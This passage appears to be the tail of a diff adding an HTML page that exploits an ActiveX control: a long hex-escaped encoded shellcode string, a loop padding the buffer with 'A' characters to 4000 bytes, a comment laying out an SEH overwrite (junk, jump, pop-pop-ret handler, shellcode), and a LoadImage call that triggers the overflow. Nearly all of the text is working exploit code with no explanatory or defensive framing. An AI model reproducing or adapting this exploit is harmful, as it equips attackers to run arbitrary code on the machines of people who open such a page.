+"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
+"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
+"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
+"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
+"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
+"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
+"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
+"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
+"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
+"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
+"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
+"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
+"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
+"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
+"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
+"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
+"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
+"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
+"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
+"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
+"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
+"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
+"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
+"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
+"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
+"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
+"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
+"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
+"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
+
+for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++)
+{
+ buff += "A";
+}
+
+// [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode]
+fbuff = arg1 + nseh + seh + nops + sc  + buff;
+target.LoadImage(fbuff);
+
+</script>
+</html>